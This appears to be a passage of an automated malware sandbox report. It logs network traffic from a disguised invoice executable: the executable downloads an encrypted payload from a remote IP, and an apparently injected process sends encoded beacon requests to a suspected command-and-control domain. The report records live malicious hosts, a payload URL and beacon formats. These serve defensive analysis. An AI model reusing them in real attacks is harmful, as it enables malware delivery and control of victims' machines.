                                                Jan 15, 2025 18:20:24.685959101 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.685986042 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686074972 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686108112 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686237097 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686270952 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686322927 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686374903 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686434984 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686469078 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686569929 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686652899 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686665058 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686727047 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686775923 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686806917 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.686887026 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.686938047 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687006950 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687025070 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687120914 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687158108 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687268972 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687340975 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687366962 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687416077 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687477112 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687509060 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687592030 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687691927 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687714100 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687741041 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687829971 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687861919 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.687972069 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.687978029 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688080072 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688117027 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688180923 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688224077 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688288927 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688328028 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688427925 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688432932 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688534975 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688575983 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688644886 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688693047 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688764095 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688796997 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.688878059 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.688914061 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.689045906 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.689054966 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.689104080 CET8049762212.162.149.165192.168.11.20
                                                Jan 15, 2025 18:20:24.689183950 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:24.689261913 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:38.878555059 CET4976280192.168.11.20212.162.149.165
                                                Jan 15, 2025 18:20:57.667798996 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:57.834799051 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:57.835153103 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:57.837353945 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.003823042 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019005060 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019068003 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019112110 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019224882 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019349098 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.019428968 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019484997 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019526005 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.019531012 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019659042 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019745111 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.019762039 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.019928932 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.019975901 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.020334959 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.186067104 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186114073 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186145067 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186175108 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186378002 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186419964 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186424017 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.186424017 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.186585903 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186690092 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186736107 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.186942101 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186981916 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.186994076 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.187136889 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187227964 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187280893 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.187412977 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187453985 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187530041 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.187561035 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187587976 CET804976367.223.117.189192.168.11.20
                                                Jan 15, 2025 18:20:58.187707901 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.187889099 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.188467026 CET4976380192.168.11.2067.223.117.189
                                                Jan 15, 2025 18:20:58.354809999 CET804976367.223.117.189192.168.11.20

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 15, 2025 18:20:47.275878906 CET5631753192.168.11.201.1.1.1
                                                Jan 15, 2025 18:20:47.387069941 CET53563171.1.1.1192.168.11.20
                                                Jan 15, 2025 18:20:52.391047001 CET5327853192.168.11.201.1.1.1
                                                Jan 15, 2025 18:20:52.494688988 CET53532781.1.1.1192.168.11.20
                                                Jan 15, 2025 18:20:57.499398947 CET6330453192.168.11.201.1.1.1
                                                Jan 15, 2025 18:20:57.664299965 CET53633041.1.1.1192.168.11.20

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 15, 2025 18:20:47.275878906 CET192.168.11.201.1.1.10x9b84Standard query (0)www.fullhdfilmizlesene.unoA (IP address)IN (0x0001)false
                                                Jan 15, 2025 18:20:52.391047001 CET192.168.11.201.1.1.10xabcfStandard query (0)www.brunokito.cloudA (IP address)IN (0x0001)false
                                                Jan 15, 2025 18:20:57.499398947 CET192.168.11.201.1.1.10xa900Standard query (0)www.flourishno.lifeA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 15, 2025 18:20:47.387069941 CET1.1.1.1192.168.11.200x9b84Name error (3)www.fullhdfilmizlesene.unononenoneA (IP address)IN (0x0001)false
                                                Jan 15, 2025 18:20:52.494688988 CET1.1.1.1192.168.11.200xabcfName error (3)www.brunokito.cloudnonenoneA (IP address)IN (0x0001)false
                                                Jan 15, 2025 18:20:57.664299965 CET1.1.1.1192.168.11.200xa900No error (0)www.flourishno.life67.223.117.189A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • 212.162.149.165
                                                • www.flourishno.life

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049762212.162.149.165801600C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 15, 2025 18:20:23.826337099 CET178OUTGET /psKGLMYRljeu25.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                Host: 212.162.149.165
                                                Cache-Control: no-cache
                                                Jan 15, 2025 18:20:23.968616009 CET1289INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Wed, 15 Jan 2025 05:47:22 GMT
                                                Accept-Ranges: bytes
                                                ETag: "bdc2a2f21067db1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Wed, 15 Jan 2025 17:20:23 GMT
                                                Content-Length: 287808
                                                Data Raw: fe 26 77 a5 86 67 30 f4 80 77 24 b0 ed ed ac 42 df 14 d2 c6 fb 2d f1 f4 f5 41 9c 79 3f ea bc 49 db fe d2 51 4d fa 98 5a 3a 19 c2 f5 ab ef 05 ec 44 dc e9 64 61 87 6d bc f1 89 d6 6d 48 61 84 3c 9e 71 2a cf 6a ee 83 15 dc 7b aa fb a7 05 b5 2b 5c f4 4d 0d 43 be 52 79 8f cc ea 53 f4 c7 43 ac 99 c2 58 85 57 cb 9f 66 23 88 d3 41 09 05 a8 38 3a 6b 53 5b c6 56 ea 83 d9 d2 24 fa 8d e2 19 25 3a 27 83 62 a4 4d cb ee fe 91 f3 7e 91 ab 9d de a6 b6 70 5e 80 86 e5 df 33 0c 89 b0 99 94 6e 39 0f 72 13 5d 0d 31 74 da 4a 2c 98 c9 c3 d7 35 83 db c8 37 98 10 a0 1d 65 b5 c3 40 09 9c cf 28 80 ba d3 39 81 4c d6 8a 0c 3e b3 80 12 e1 30 76 2a fa 13 26 59 30 51 7e 06 60 a9 8a cf b1 b8 76 17 d0 1e 95 14 5b 0d e6 d8 2b 58 f3 5f a5 86 37 d1 80 68 54 02 91 21 97 a1 e6 77 25 2b f5 24 2d 66 77 9f 46 b4 4e c4 d4 ea b9 24 bb ad 04 06 e3 40 09 0c 8f a1 b5 63 77 bd cf 44 9f a7 1a 56 93 5d ed 21 97 7c c0 58 db 1e 57 38 41 93 26 e4 e9 b9 7f 39 b7 e7 93 8a a1 fc c7 33 65 6a a4 58 a2 db dc 32 cb 8d 37 ef 5e 7a 1f f3 fc 97 a7 6b b8 f2 72 3b [TRUNCATED]
                                                Data Ascii: &wg0w$B-Ay?IQMZ:DdammHa<q*j{+\MCRySCXWf#A8:kS[V$%:'bM~p^3n9r]1tJ,57e@(9L>0v*&Y0Q~`v[+X_7hT!w%+$-fwFN$@cwDV]!|XW8A&93ejX27^zkr;Oq~&DyST'7;~Hxk^f(v[l4exz@k^Z<NP@GVVdLIMH/f`7f1EmUhW2[,k"ODD/Fx`0?WYaMt]F)-@9A$=A+cga|?Y#RP9C>|Fu~S_Uiv`JD\!;8{jqPF:LlNOlg:27N'3WMk37&_Mw#A9UUu(-)I@HY`i'L4zjQ3=-Z#X~"Zfhcq*k }1vy69*w^Z(edYi|&a4^06~$"Lj+"rHbyR0LTV#9oL._`,5V<+\>M;U-D 7rMqa>' [TRUNCATED]
                                                Jan 15, 2025 18:20:23.968683004 CET1289INData Raw: c3 f0 28 0e c9 c0 6b 28 f4 08 8a 27 0e 33 58 f9 71 5a 10 3e ae 78 19 56 95 ee 48 9b c3 f4 e9 60 6c b7 e8 e4 a4 72 14 08 54 1d 43 00 56 75 0d 66 f9 05 86 d1 5d 35 5e 7a e5 e1 e7 8d 5f ac 05 8c a8 0d d6 5a ae 52 51 6f 4f 51 44 e0 ed b5 71 9a e2 55
                                                Data Ascii: (k('3XqZ>xVH`lrTCVuf]5^z_ZRQoOQDqU\Xy.{Ddc~X+YC0[p/5R^QUnyT%N_) J[nc#:(*PD-
                                                Jan 15, 2025 18:20:23.968728065 CET1289INData Raw: 2d 44 20 ac f8 ea 9b 37 c2 c0 72 0a be f6 12 c8 e8 4d 71 e5 97 61 b8 c0 3e 27 e9 81 38 4d 31 77 42 d6 07 0b 49 4b 2e d1 6e 70 a6 4b f2 d6 80 c2 c8 f7 3c 57 43 7b 59 49 ac 0d 94 fc 9c 49 c3 f0 28 0e c9 c0 6b 28 f4 08 8a 27 0e 33 58 f9 71 5a 10 3e
                                                Data Ascii: -D 7rMqa>'8M1wBIK.npK<WC{YII(k('3XqZ>xVH`lrTCVuf]5^z_ZRQoOQDqU\Xy.{Ddc~X+YC0[p/5R^QUnyT%N
                                                Jan 15, 2025 18:20:23.968771935 CET1289INData Raw: 97 a2 95 d3 aa b6 1a f2 1b 39 05 6f 07 4c 2e e0 c9 fe 5f 8c 99 98 e5 1c cf 8c 60 88 2c b6 b3 35 ca c3 1a 56 3c 13 e1 9c b1 fe fb bd d4 2b 94 9c 16 5c 98 82 ae 13 09 ae 12 3e 96 4d 3b 55 2d 44 20 ac f8 ea 9b 37 c2 c0 72 0a be f6 12 c8 e8 4d 71 e5
                                                Data Ascii: 9oL._`,5V<+\>M;U-D 7rMqa>'8M1wBIK.npK<WC{YII(k('3XqZ>xVH`lrTCVuf]5^z_ZRQoOQDqU\Xy.{
                                                Jan 15, 2025 18:20:24.110039949 CET1289INData Raw: 14 dc 6c 61 e3 30 36 7c 57 24 18 ef 9c 2b 37 5b 22 ff a1 00 eb 8e 36 98 e7 e1 a5 27 73 d8 ba de c6 f9 d0 01 2e 6d af 82 e7 f1 2c 92 05 56 09 9a ed 5c 89 96 46 94 8d f6 13 dc 45 62 47 ef c9 2a cc c5 f1 3d ff af d8 04 74 41 07 4c 21 65 1a fe 5f 8c
                                                Data Ascii: la06|W$+7["6's.m,V\FEbG*=tAL!e_ ,5r"A`?_Uu_RE iW:g7%(/-t}0y^t2N-z7JQGn7/]'XqdxTH`c*4vAy?
                                                Jan 15, 2025 18:20:24.110100031 CET1289INData Raw: d6 46 2a 71 0b 92 16 d7 18 f5 d7 3d 6a 7d 8e f6 c3 01 4a 1c 84 29 03 94 bd 64 cd 3a 63 14 36 11 a9 8f b5 a1 fa 50 a4 30 89 8c ad 09 2b b4 c0 9e 5f 18 a3 bd 33 39 c5 3b f5 6b a6 b1 75 a0 eb 23 cf 3c e0 30 bf 71 f2 da e7 10 d0 91 92 dd 10 fb a1 3c
                                                Data Ascii: F*q=j}J)d:c6P0+_39;ku#<0q<M /JW4}zA5i9,^n"h]C9ny>\]XbM/|A[cNGH+,uGo:2GRwfLqMq>'B~.wqlWCI
                                                Jan 15, 2025 18:20:24.110145092 CET1289INData Raw: 1b e2 03 91 b8 c3 cd 33 d0 d5 2a 26 07 14 13 b0 6a 46 2b 06 d0 a3 ea 53 f5 80 6d 88 e2 58 71 4e e6 c9 a7 5e 6f d9 cd 6a f5 c1 42 8b 98 06 86 e5 aa 99 11 cf d7 8f f4 32 09 6a 2f 9e 08 fb 84 88 ef 72 7b 2b fb 6b e7 b5 60 e8 6d f1 7a 96 35 06 e1 fc
                                                Data Ascii: 3*&jF+SmXqN^ojB2j/r{+k`mz5P;M7fl)7f$Q["pnp4#e;0/#r5)Hncand]dJRbNTH|R-:J*@SL;xNygvpSN3D
                                                Jan 15, 2025 18:20:24.110188007 CET1289INData Raw: f6 b4 ef ac dc 4c db 48 a1 29 03 de cd 87 a2 68 0b b0 46 fc a7 b0 c6 bd 0e c9 ad 65 9f d8 31 af 2f c0 2a 9f 41 0b 95 8b 09 d0 02 ac 97 c0 e8 1d ed 8d d6 d7 ba a5 a9 5b e2 48 c7 21 21 fc 45 c9 f1 66 bf c2 b2 ff 18 e2 eb 9f 82 17 3a 34 41 c8 6d b0
                                                Data Ascii: LH)hFe1/*A[H!!Ef:4AmF>(lVXk."#'`ZFfYu_,]>#+iLvpE86WW+{`4gIm.DOf4OPvx0z'\{b
                                                Jan 15, 2025 18:20:24.110260010 CET1289INData Raw: d6 a8 75 e2 e3 2b 10 38 55 b6 11 d7 cd 98 52 98 72 a4 6a 8c 9f 22 38 7b c6 6a d3 79 16 9a e5 36 3c a8 d7 ee 07 75 f8 8d 73 73 b5 df 02 f7 ce ee 9d 12 02 b8 db 19 66 f1 38 c4 77 15 32 e9 4b 94 b3 66 95 4c 16 54 a2 eb 0e ab 48 cc e8 2b 31 db f2 8b
                                                Data Ascii: u+8URrj"8{jy6<ussf8w2KfLTH+1F-U&_=)#L,"nmS\ppPYjG'Lj&d}Be+;\/\3=PTp)9B?$W~~y6~GQn*Dle~VH
                                                Jan 15, 2025 18:20:24.110305071 CET1289INData Raw: 8f cf 6f 30 d8 d6 bc 1b 98 37 7b 15 87 44 8b 8b 36 bb 3a 75 ca ba 3b 09 4e 17 78 6e ca 7a ca e9 28 58 a2 22 53 ea 9c a1 6e 12 61 87 82 47 97 41 ab 96 0f bd 9d 97 b5 29 58 a2 fe c9 76 0e 9c 25 99 3c 8d 9a 82 a7 0f 2b 44 d1 1e 72 84 de 79 1a 23 74
                                                Data Ascii: o07{D6:u;Nxnz(X"SnaGA)Xv%<+Dry#t9S7G.pZzHnM>f&EG/]|I:_#]Hg'F:m`dpc_8__>-.y-M
                                                Jan 15, 2025 18:20:24.110348940 CET1289INData Raw: 9c b6 3b f3 80 bb cc 40 a1 0f 6c b3 2f c8 6d 00 ad e6 d8 99 de 0f 1d d4 11 78 b9 23 d1 96 7d c1 2b 93 32 31 f2 77 37 24 4a f2 51 2c 15 8d 51 7d 7f c6 94 0c b6 1f 42 59 06 bb 97 ba f0 4f a4 d0 dd 11 2d 57 ab 47 66 b1 5f 0a e1 44 7a ef 36 03 28 51
                                                Data Ascii: ;@l/mx#}+21w7$JQ,Q}BYO-WGf_Dz6(Qnn;71N9;F{sm/YN:^?}I-_&rNGIP]H"{S9'G6's`}QAro?dgwK"KmzHm`AuJvHZ


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.11.204976367.223.117.189806480C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                TimestampBytes transferredDirectionData
                                                Jan 15, 2025 18:20:57.837353945 CET512OUTGET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1
                                                Host: www.flourishno.life
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
                                                Jan 15, 2025 18:20:58.019005060 CET1289INHTTP/1.1 404 Not Found
                                                Date: Wed, 15 Jan 2025 17:20:57 GMT
                                                Server: Apache
                                                Content-Length: 32106
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                Jan 15, 2025 18:20:58.019068003 CET1289INData Raw: 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 61 6e 63 79 62 6f 78 2d 6d 61 73 74 65 72 2f 6a 71 75 65 72 79 2e 66 61
                                                Data Ascii: t"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="as
                                                Jan 15, 2025 18:20:58.019112110 CET1289INData Raw: 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 4c 6f 61 64 69 6e 67 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 3c 64 69 76 20 69 64 3d 22 6a 75 2d 6c 6f 61 64
                                                Data Ascii: </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></di
                                                Jan 15, 2025 18:20:58.019224882 CET1289INData Raw: 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20
                                                Data Ascii: src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right">
                                                Jan 15, 2025 18:20:58.019428968 CET1289INData Raw: 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e
                                                Data Ascii: pse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span>
                                                Jan 15, 2025 18:20:58.019484997 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20
                                                Data Ascii: </ul> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav2"
                                                Jan 15, 2025 18:20:58.019531012 CET1289INData Raw: 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 31 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 2d 6d 65 67 61 6d 65 6e 75 2e 68 74
                                                Data Ascii: .html">Header 1 Dark</a></li><li><a class="dropdown-item" href="header-megamenu.html">Header Mega menu</a></li> </ul> </li>
                                                Jan 15, 2025 18:20:58.019659042 CET1289INData Raw: 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 33 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: nsparent.html">Header 3 Transparent</a></li> <li><a class="dropdown-item" href="header3-light.html">Header 3 Light</a></li>
                                                Jan 15, 2025 18:20:58.019745111 CET1289INData Raw: 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 35 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c
                                                Data Ascii: ef="#">Header 5</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header5-transparent.html">Header 5 Transparen
                                                Jan 15, 2025 18:20:58.019975901 CET1289INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77
                                                Data Ascii: <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li> <li><a class="dropdown-item" href="Footer1-
